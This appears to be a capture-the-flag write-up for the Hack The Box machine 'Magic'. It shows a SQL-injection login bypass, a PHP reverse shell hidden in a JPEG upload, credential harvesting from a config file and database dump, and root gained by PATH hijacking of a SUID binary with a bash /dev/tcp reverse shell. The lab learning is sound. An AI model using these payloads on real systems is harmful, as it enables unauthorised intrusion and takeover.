Skip to content

HTB Magic done 1

Magic

Notes

OS:

Linux

Technology:

IP Address:

10.129.214.115

Open ports:

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Users and pass:

From file: /var/www/html/db.php5
$dbName = 'Magic' ;
$dbHost = 'localhost' ;
$dbUsername = 'theseus';
$dbUserPassword = 'iamkingtheseus';
---
From dump database
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
---
SSH user: theseus
L: theseus
P: Th3s3usW4sK1ng

Nmap

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.214.115_nmap 10.129.214.115 ; cat 10.129.214.115_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 14:00 CET
Nmap scan report for 10.129.214.115
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)

Ffuz: http://10.129.214.115

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ ffuf -u http://10.129.214.115/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.214.115_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.214.115/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git 
 :: Output file      : 10.129.214.115_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

assets                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.214.115/assets/FUZZ

images                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://10.129.214.115/images/FUZZ

index.php               [Status: 200, Size: 4053, Words: 491, Lines: 60, Duration: 42ms]
login.php               [Status: 200, Size: 4221, Words: 1179, Lines: 118, Duration: 46ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 46ms]
upload.php              [Status: 302, Size: 2957, Words: 814, Lines: 85, Duration: 39ms]
[INFO] Starting queued job on target: http://10.129.214.115/assets/FUZZ

css                     [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 37ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.214.115/assets/css/
js                      [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 44ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.214.115/assets/js/
[INFO] Starting queued job on target: http://10.129.214.115/images/FUZZ

uploads                 [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.214.115/images/uploads/
:: Progress: [163752/163752] :: Job [3/3] :: 1156 req/sec :: Duration: [0:03:17] :: Errors: 0 ::

Bypass auth as admin user

POST /login.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/login.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin
___

POST /login.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/login.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin'

---
POST /login.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/login.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin%27+or+1%3D1+--

Create revshell

POST /upload.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------256873977516807931332031173037
Content-Length: 457
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/upload.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------256873977516807931332031173037
Content-Disposition: form-data; name="image"; filename="r2.php.jpeg"
Content-Type: image/jpeg

ÿØÿàJFIFÿۄ      
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.50/80 0>&1'"); ?>

-----------------------------256873977516807931332031173037
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------256873977516807931332031173037--

---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.50] from (UNKNOWN) [10.129.214.115] 34048
bash: cannot set terminal process group (1138): Inappropriate ioctl for device
bash: no job control in this shell
www-data@magic:/var/www/Magic/images/uploads$   

www-data@magic:/var/www/Magic/images/uploads$ whereis python     
whereis python
python: /usr/bin/python3.6m /usr/bin/python3.6 /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /usr/lib/python3.8 /etc/python2.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/include/python3.6m /usr/share/python
www-data@magic:/var/www/Magic/images/uploads$ 

www-data@magic:/var/www/Magic/images/uploads$ /usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
<n/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$

Read file: /var/www/html/db.php5

Find creds to DB:
$dbName = 'Magic' ;
$dbHost = 'localhost' ;
$dbUsername = 'theseus';
$dbUserPassword = 'iamkingtheseus';
---
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Dump database

Find creds:
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
---
www-data@magic:/home$ mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
<us --password=iamkingtheseus --host=localhost Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version   5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2025-03-26  8:07:10

Login as user: theseus

L: theseus
P: Th3s3usW4sK1ng
---
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
su: must be run from a terminal
www-data@magic:/var/www/Magic/images/uploads$ /usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
<n/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@magic:/var/www/Magic/images/uploads$ cd ~

Find SUID binary

Found interesing binary: /bin/sysinfo
---
theseus@magic:~$ find / -perm -u=s -type f 2>/dev/null | grep -vE "snap|lib"
find / -perm -u=s -type f 2>/dev/null | grep -vE "snap|lib"
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

Check binary: /bin/sysinfo

...
theseus@magic:~$ strings /bin/sysinfo | grep Disk
strings /bin/sysinfo | grep Disk
====================Disk Info====================
theseus@magic:~$ strings /bin/sysinfo | grep -C3 "Disk"
strings /bin/sysinfo | grep -C3 "Disk"
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
...

Create revshell

theseus@magic:~$ cd /tmp/
cd /tmp/
theseus@magic:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.53/80 0>&1' > fdisk
<n\nbash -i >& /dev/tcp/10.10.14.53/80 0>&1' > fdisk
theseus@magic:/tmp$ chmod a+x fdisk
chmod a+x fdisk
theseus@magic:/tmp$ 

theseus@magic:/tmp$ ls -la fdisk
ls -la fdisk
-rwxrwxr-x 1 theseus theseus 53 Mar 27 04:50 fdisk
theseus@magic:/tmp$

Edit $PATH

theseus@magic:/tmp$ export $PATH
export $PATH
bash: export: `/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games': not a valid identifier
theseus@magic:/tmp$ export PATH="/tmp/:$PATH"
export PATH="/tmp/:$PATH"
theseus@magic:/tmp$ 

theseus@magic:/tmp$ export $PATH
export $PATH
bash: export: `/tmp/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games': not a valid identifier
theseus@magic:/tmp$

Run revshell

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.53] from (UNKNOWN) [10.129.214.115] 55572
root@magic:/tmp# 
---
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
H/W path           Device     Class      Description
====================================================
...
...

Read flag: root.txt

root@magic:/tmp# cd /root
cd /root
root@magic:/root# ls -a
ls -a
.
..
.bash_history
.bash_profile
.bashrc
.cache
.gnupg
info.c
.local
root.txt
snap
root@magic:/root# 

root@magic:/root# cat root.txt ; id
cat root.txt ; id
9523cab56f86c859d32ebc804b9a00da
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@magic:/root#

References

Lessons Learned

Tags